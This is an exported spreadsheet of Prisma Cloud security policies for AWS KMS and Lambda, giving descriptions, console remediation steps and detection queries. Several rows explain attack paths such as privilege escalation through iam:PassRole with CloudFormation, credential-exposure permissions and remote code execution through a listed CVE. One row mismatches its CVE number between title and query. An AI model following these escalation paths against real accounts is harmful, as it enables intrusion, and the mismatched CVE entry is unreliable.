Ensuring that your Amazon Key Management Service (AWS KMS) key is enabled is important because it determines whether the key can be used to perform cryptographic operations.  If an AWS KMS Key is disabled, any operations dependent on that key, such as encryption or decryption of data, will fail. This can lead to application downtime, data access issues, and potential data loss if not addressed promptly.
It is recommended to enable the AWS KMS Customer Managed Key (CMK) if it is used in the application, to restore cryptographic operations and ensure your applications and services can access encrypted data.</t>
        </is>
      </c>
      <c r="X1983" t="inlineStr">
        <is>
          <t>To enable the AWS KMS customer managed keys.
1. Sign in to the AWS Management Console and open the AWS Key Management Service (AWS KMS) console at https://console.aws.amazon.com/kms.
2. To change the AWS Region that the reported resource is presented in, use the Region selector in the upper-right corner of the page.
3. In the navigation pane, choose 'Customer-managed keys'.
4. Select the reported CMK and click on the dropdown 'Key Actions'.
5. Choose the 'Enable' option. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-key-management-service-kms-key-is-enabled
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-key-management-service-kms-key-is-enabled</t>
        </is>
      </c>
      <c r="Y1983" t="inlineStr"/>
      <c r="Z1983" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-kms-get-key-rotation-status' AND json.rule = keyMetadata.enabled is false
{"category":"General","resourceTypes":["aws_kms_key"]}</t>
        </is>
      </c>
      <c r="AA1983" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1983" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1983" t="inlineStr">
        <is>
          <t>PC-AWS-KMS-1279-CKV_AWS_227</t>
        </is>
      </c>
      <c r="AD1983" t="b">
        <v>1</v>
      </c>
      <c r="AE1983" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1983" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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83" t="inlineStr">
        <is>
          <t>969e16f3-7889-4e67-b1d4-952f32a9e385</t>
        </is>
      </c>
      <c r="AI1983" t="inlineStr">
        <is>
          <t>c4a7a1ad-0e32-4dea-9ed7-284bdba72429</t>
        </is>
      </c>
      <c r="AJ1983" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1983" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1984">
      <c r="A1984" t="inlineStr">
        <is>
          <t>kashan ACSC Information Security Manual (ISM), ISO/IEC 27017:2015, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, HITRUST CSF v.9.6.0, MAS TRM 2021, MAS TRM 2021, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, NIST CSF, CHC HITRUST CSF v.9.6.0, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST v.9.4.2 [Deprecated], CIS Controls v8.1, ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 2, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1984" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1984" s="2" t="inlineStr"/>
      <c r="D1984" t="inlineStr"/>
      <c r="E1984" t="inlineStr"/>
      <c r="F1984" t="inlineStr"/>
      <c r="G1984" t="b">
        <v>0</v>
      </c>
      <c r="H19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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1984" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K1984" t="inlineStr">
        <is>
          <t>AWS Lambda nearing availability code storage limit</t>
        </is>
      </c>
      <c r="L1984" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1984" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1984" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1984" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1984" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1984" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1984" t="inlineStr">
        <is>
          <t>ISM-1437</t>
        </is>
      </c>
      <c r="S1984" t="inlineStr"/>
      <c r="T1984" t="b">
        <v>0</v>
      </c>
      <c r="U1984" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1984" t="inlineStr">
        <is>
          <t>aws-lambda-get-region-summary</t>
        </is>
      </c>
      <c r="W1984" t="inlineStr">
        <is>
          <t>This policy identifies Lambda nearing availability code storage limit per region. AWS provides a reasonable starting amount of compute and storage resources that you can use to run and store functions. As a best practice, it is recommended to either remove the functions that you no longer in use or reduce the code size of the functions that you do not want to remove. It will also help you avoid unexpected charges on your bill.
NOTE: As per https://docs.aws.amazon.com/lambda/latest/dg/limits.html. On the date, Lambda account limit per region is 75 GB. This policy will trigger an alert if Lambda account limit per region reached to 90% (i.e. 67500000 KB) of resource availability limit allocated. If you need more Lambda account code storage size per region, You can contact AWS for a service limit increase.</t>
        </is>
      </c>
      <c r="X1984" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to the AWS Lambda Dashboard
4. Click on 'Functions', choose each the lambda function 
5. Either remove the function that you no longer use or deduce the code size of the function that if you do not want to remove.</t>
        </is>
      </c>
      <c r="Y1984" t="inlineStr"/>
      <c r="Z1984" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-lambda-get-region-summary' AND json.rule = 'lambdaCodeSize.size &gt; 67500000'</t>
        </is>
      </c>
      <c r="AA1984" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1984" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1984" t="inlineStr">
        <is>
          <t>PC-AWS-LMB-262</t>
        </is>
      </c>
      <c r="AD1984" t="b">
        <v>1</v>
      </c>
      <c r="AE1984" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1984" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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4" t="inlineStr">
        <is>
          <t>f2c2d8e3-4e88-4887-a7af-1d0cfcad0a48</t>
        </is>
      </c>
      <c r="AI1984" t="inlineStr">
        <is>
          <t>59f9703b-bca0-46ae-bd6f-bbe9f83b3a67</t>
        </is>
      </c>
      <c r="AJ1984" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1984" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1985">
      <c r="A1985" t="inlineStr"/>
      <c r="B1985" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1985" s="2" t="inlineStr"/>
      <c r="D1985" t="inlineStr"/>
      <c r="E1985" t="inlineStr"/>
      <c r="F1985" t="inlineStr"/>
      <c r="G1985" t="b">
        <v>1</v>
      </c>
      <c r="H19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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1985" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K1985" t="inlineStr">
        <is>
          <t>Unauthorized function invocation risk due to a publicly exposed and unauthenticated AWS Lambda Function with insecure CORS permissions</t>
        </is>
      </c>
      <c r="L1985" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1985" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1985" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1985" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1985" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1985" t="inlineStr"/>
      <c r="R1985" t="inlineStr"/>
      <c r="S1985" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1985" t="b">
        <v>0</v>
      </c>
      <c r="U1985" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1985" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W1985" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Functions that are publicly exposed through resource based policies with URL AuthType set to NONE and are configured with overly permissive CORS permissions.
AuthType determines how Lambda authenticates or authorizes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further help the attackers to perform unauthorized actions in the cloud account. Overly permissive CORS settings (allowing wildcards) can potentially expose the Lambda function to unwarranted requests and cross-site scripting attacks. Explicitly specifying allowed origins and methods instead of wildcards is essential for CORS configuration because it provides better control over access, reduces security risks, and helps prevent unauthorized access or unintended actions to your AWS Lambda function.
Immediate attention is required to configure the Lambda function authentication type to AWS_IA, remove unwanted CORS permissions assigned to the Lambda function and estrict public exposure reported for the Lambda Function as soon as possible.</t>
        </is>
      </c>
      <c r="X1985"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[MISCONFIGURATION]
To properly configure CORS permissions, refer the following URL:
https://docs.aws.amazon.com/lambda/latest/dg/API_Cors.html</t>
        </is>
      </c>
      <c r="Y1985" t="inlineStr"/>
      <c r="Z1985" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-lambda-list-functions') and finding.name contains all ('Publicly Executable Lambda','AWS Lambda function URL AuthType set to NONE','AWS Lambda function URL having overly permissive cross-origin resource sharing permissions')</t>
        </is>
      </c>
      <c r="AA1985" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1985" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:21</t>
        </is>
      </c>
      <c r="AC1985" t="inlineStr"/>
      <c r="AD1985" t="b">
        <v>1</v>
      </c>
      <c r="AE1985" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1985" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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5" t="inlineStr">
        <is>
          <t>189ec915-d795-4602-8753-8b4e070c8fc0</t>
        </is>
      </c>
      <c r="AI1985" t="inlineStr">
        <is>
          <t>7b24130a-3324-43fe-974b-5af9df5528f5</t>
        </is>
      </c>
      <c r="AJ1985" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1985" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1986">
      <c r="A1986" t="inlineStr"/>
      <c r="B1986" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1986" s="2" t="inlineStr"/>
      <c r="D1986" t="inlineStr"/>
      <c r="E1986" t="inlineStr"/>
      <c r="F1986" t="inlineStr"/>
      <c r="G1986" t="b">
        <v>1</v>
      </c>
      <c r="H19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86" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1986" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K1986" t="inlineStr">
        <is>
          <t>Privilege escalation and lateral movement risk due to a publicly exposed AWS Lambda function with administrative permissions</t>
        </is>
      </c>
      <c r="L1986" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1986" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1986" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1986" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1986" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1986" t="inlineStr"/>
      <c r="R1986" t="inlineStr"/>
      <c r="S1986" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1986" t="b">
        <v>0</v>
      </c>
      <c r="U1986" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1986" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W1986" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda functions that are publicly writable with administrative permissions that could potentially lead to privilege escalation and lateral movement.
Lambda functions configured to allow unauthorized identities to modify the function's code or configuration settings let the attackers exploit an AWS Lambda function with administrative privilege, which can lead to unauthorized access and data breach.
Immediate attention is required to restrict public exposure and review risky administrative permissions for the AWS Lambda function as soon as possible.</t>
        </is>
      </c>
      <c r="X1986" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
Remediation steps:
1. Log in to your AWS account
2. Navigate to the Lambda function
3. Under the 'Configuration' tab, select 'Permissions'
4. Under 'Resource-based policy statements' edit the resource policy to only allow required parties to modify the function
[PERMISSION]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1986" t="inlineStr"/>
      <c r="Z1986" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-lambda-list-functions') and finding.name contains all ('Publicly Writable Lambda','AWS Lambda Function with administrative permissions')</t>
        </is>
      </c>
      <c r="AA1986" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1986" t="inlineStr">
        <is>
          <t>2024-09-27 06:57:39</t>
        </is>
      </c>
      <c r="AC1986" t="inlineStr"/>
      <c r="AD1986" t="b">
        <v>1</v>
      </c>
      <c r="AE1986" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1986" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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86" t="inlineStr">
        <is>
          <t>152b2d62-bde3-46f0-9ec6-5748a16e65da</t>
        </is>
      </c>
      <c r="AI1986" t="inlineStr">
        <is>
          <t>2583cd7f-98f9-4b99-943e-2b413d5d3d56</t>
        </is>
      </c>
      <c r="AJ1986" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1986" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1987">
      <c r="A1987" t="inlineStr"/>
      <c r="B1987" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1987" s="2" t="inlineStr"/>
      <c r="D1987" t="inlineStr"/>
      <c r="E1987" t="inlineStr"/>
      <c r="F1987" t="inlineStr"/>
      <c r="G1987" t="b">
        <v>1</v>
      </c>
      <c r="H19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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1987" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K1987" t="inlineStr">
        <is>
          <t>Credential exposure risk due to a publicly exposed and unauthenticated AWS Lambda function with risky credential exposure permissions</t>
        </is>
      </c>
      <c r="L1987" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1987" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1987" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1987" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1987" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1987" t="inlineStr"/>
      <c r="R1987" t="inlineStr"/>
      <c r="S1987" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1987" t="b">
        <v>0</v>
      </c>
      <c r="U1987" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1987" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W1987" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Functions that are publicly exposed through resource-based policies with URL AuthType set to NONE and data destruction permissions.
AuthType determines how Lambda authenticates or authorizes requests to your function URL. When AuthType is set to NONE, Lambda doesn't perform any authentication before invoking your function. The lambda function publicly accessible from the internet could allow malicious actors to get initial access to the lambda function and unauthenticated Lambda Function with access to get credentials from critical resources like instances, ecr repositories, iam identities, and others. 
This policy checks for the following credentials exposure permissions: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1987" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS Lambda Function service
3. Find resource-based policy of the AWS Lambda Function resource
4. Update the 'Principal' section of the policy to avoid public access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t>
        </is>
      </c>
      <c r="Y1987" t="inlineStr"/>
      <c r="Z1987" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-lambda-list-functions') and finding.name contains all ('Publicly Executable Lambda','AWS Lambda function URL AuthType set to NONE','AWS Lambda with IAM role attached has credentials exposure permissions')</t>
        </is>
      </c>
      <c r="AA1987" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1987" t="inlineStr">
        <is>
          <t>2023-09-29 05:49:19</t>
        </is>
      </c>
      <c r="AC1987" t="inlineStr"/>
      <c r="AD1987" t="b">
        <v>1</v>
      </c>
      <c r="AE1987" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1987" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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7" t="inlineStr">
        <is>
          <t>d0d00426-008f-4b7d-85f2-36e02c48a6ae</t>
        </is>
      </c>
      <c r="AI1987" t="inlineStr">
        <is>
          <t>6dcb0fc6-6994-49f7-9a97-738747395b40</t>
        </is>
      </c>
      <c r="AJ1987" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1987" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1988">
      <c r="A1988" t="inlineStr"/>
      <c r="B1988" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1988" s="2" t="inlineStr"/>
      <c r="D1988" t="inlineStr"/>
      <c r="E1988" t="inlineStr"/>
      <c r="F1988" t="inlineStr"/>
      <c r="G1988" t="b">
        <v>1</v>
      </c>
      <c r="H19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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1988" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K1988" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable AWS Lambda function [Apache, CVE-2022-42889]</t>
        </is>
      </c>
      <c r="L1988" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1988" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1988" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1988" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1988" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1988" t="inlineStr"/>
      <c r="R1988" t="inlineStr"/>
      <c r="S1988" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1988" t="b">
        <v>0</v>
      </c>
      <c r="U1988" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1988" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W1988" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Functions that are publicly exposed and have a known exploitable remote code execution vulnerability in Apache [CVE-2022-42889].
Remote code execution is a critical security concern that enables unauthorized users to execute arbitrary code on a system, potentially leading to data breaches, system compromise, or unauthorized data manipulation. The fact that the AWS Lambda function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Apache [CVE-2022-42889] vulnerability and public exposure reported for the AWS Lambda function as soon as possible.</t>
        </is>
      </c>
      <c r="X1988"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1988" t="inlineStr"/>
      <c r="Z1988" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-lambda-list-functions') and finding.name contains all ('Publicly Executable Lambda') AND with : (Vuln WHERE id IN ('CVE-2022-42889'))</t>
        </is>
      </c>
      <c r="AA1988" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1988" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:03</t>
        </is>
      </c>
      <c r="AC1988" t="inlineStr"/>
      <c r="AD1988" t="b">
        <v>1</v>
      </c>
      <c r="AE1988" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1988" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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8" t="inlineStr">
        <is>
          <t>a1fb5c99-6d91-4ff0-82fc-c74c425ae759</t>
        </is>
      </c>
      <c r="AI1988" t="inlineStr">
        <is>
          <t>1c5a5d91-dd5b-446a-84e1-bedf7811bfe7</t>
        </is>
      </c>
      <c r="AJ1988" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1988" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1989">
      <c r="A1989" t="inlineStr"/>
      <c r="B1989" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1989" s="2" t="inlineStr"/>
      <c r="D1989" t="inlineStr"/>
      <c r="E1989" t="inlineStr"/>
      <c r="F1989" t="inlineStr"/>
      <c r="G1989" t="b">
        <v>1</v>
      </c>
      <c r="H19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89" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1989" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K1989" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to publicly exposed and vulnerable AWS Lambda function [Java Spring Framework, CVE-2021-22118]</t>
        </is>
      </c>
      <c r="L1989" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1989" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1989" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1989" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1989" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1989" t="inlineStr"/>
      <c r="R1989" t="inlineStr"/>
      <c r="S1989" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1989" t="b">
        <v>0</v>
      </c>
      <c r="U1989" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1989" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W1989" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Functions that are publicly exposed and have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AWS Lambda function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Java [CVE-2021-22118] vulnerability and public exposure reported for the AWS Lambda function as soon as possible.</t>
        </is>
      </c>
      <c r="X1989"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1989" t="inlineStr"/>
      <c r="Z1989" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('aws-lambda-list-functions') and finding.name contains all ('Publicly Executable Lambda') AND with : (Vuln WHERE id IN ('CVE-2022-22118'))</t>
        </is>
      </c>
      <c r="AA1989" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1989" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:00</t>
        </is>
      </c>
      <c r="AC1989" t="inlineStr"/>
      <c r="AD1989" t="b">
        <v>1</v>
      </c>
      <c r="AE1989" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1989" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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89" t="inlineStr">
        <is>
          <t>83a6f02e-2a95-47f2-9a98-513e13c85230</t>
        </is>
      </c>
      <c r="AI1989" t="inlineStr">
        <is>
          <t>a425640a-d0cc-4fa8-a41b-74f047605848</t>
        </is>
      </c>
      <c r="AJ1989" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1989" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1990">
      <c r="A1990" t="inlineStr"/>
      <c r="B1990" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C1990" s="2" t="inlineStr"/>
      <c r="D1990" t="inlineStr"/>
      <c r="E1990" t="inlineStr"/>
      <c r="F1990" t="inlineStr"/>
      <c r="G1990" t="b">
        <v>1</v>
      </c>
      <c r="H19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1990" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1990" t="inlineStr">
        <is>
          <t>aws-lambda</t>
        </is>
      </c>
      <c r="K1990" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to a publicly exposed unauthenticated AWS Lambda function with iam:PassRole and CloudFormation Creation permissions</t>
        </is>
      </c>
      <c r="L1990" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1990" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N1990" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1990" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P1990" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q1990" t="inlineStr"/>
      <c r="R1990" t="inlineStr"/>
      <c r="S1990" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1990" t="b">
        <v>0</v>
      </c>
      <c r="U1990" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1990" t="inlineStr">
        <is>
          <t>aws-lambda-list-functions</t>
        </is>
      </c>
      <c r="W1990" t="inlineStr">
        <is>
          <t>This policy identifies AWS Lambda Functions that are publicly exposed, URL AuthType set to NONE, assigned with iam:PassRole, and have CloudFormation creation permissions.
AuthType determines how Lambda authenticates or authorises requests to your function URL. When AuthType is set to NONE, Lambda doesn't perform any authentication before invoking your function. The lambda function, publicly accessible from the internet, could allow malicious actors to get initial access to the lambda function and create CloudFormation stacks with any role that would be able to escalate their permissions by attaching a privileged role to the stack while influencing the actions taken by the created resources.
This policy checks for the following permissions:
'iam:PassRole', 'cloudformation:CreateStack'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1990" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS Lambda Function service
3. Find the resource-based policy of the AWS Lambda Function resource
4. Update the 'Principal' section of the policy to avoid public access
[PERMISSION]
Remediation steps:
1. Log in to the AWS console
2. Navigate to the Lambda Function
3. Select the ‘Permissions' section under the 'Configuration’ tab
4. Navigate to the IAM Role by clicking on the Role name
5. Under 'Permissions policies', find the relevant policy according to the alert details and remove the risky actions
[MISCONFIGURATION]
1. Sign in to the AWS console
2. Select the region from the region drop-down for which the alert is generated
3. Navigate to the AWS Lambda Dashboard
4. Click on 'Functions' (Left panel)
5. Select the lambda function for which the alert is generated
6. Go to the 'Configuration' tab
7. Select 'Function URL'
8. Click on 'Edit'
9. Set 'Auth type' to 'AWS_IAM'
10. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y1990" t="inlineStr"/>
      <c r="Z1990" t="inlineStr">
        <is>
          <t>asset where asset.type IN ( 'aws-lambda-list-functions' ) and finding.name contains all ('Publicly Executable Lambda','AWS Lambda function URL AuthType set to NONE','AWS Compute Instance (EC2/Lambda) Assigned CloudFormation Creation Permissions Which Could Lead to Privilege Escalation')</t>
        </is>
      </c>
      <c r="AA1990" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1990" t="inlineStr">
        <is>
          <t>2024-06-21 07:13:03</t>
        </is>
      </c>
      <c r="AC1990" t="inlineStr"/>
      <c r="AD1990" t="b">
        <v>1</v>
      </c>
      <c r="AE1990" t="inlineStr">
        <is>
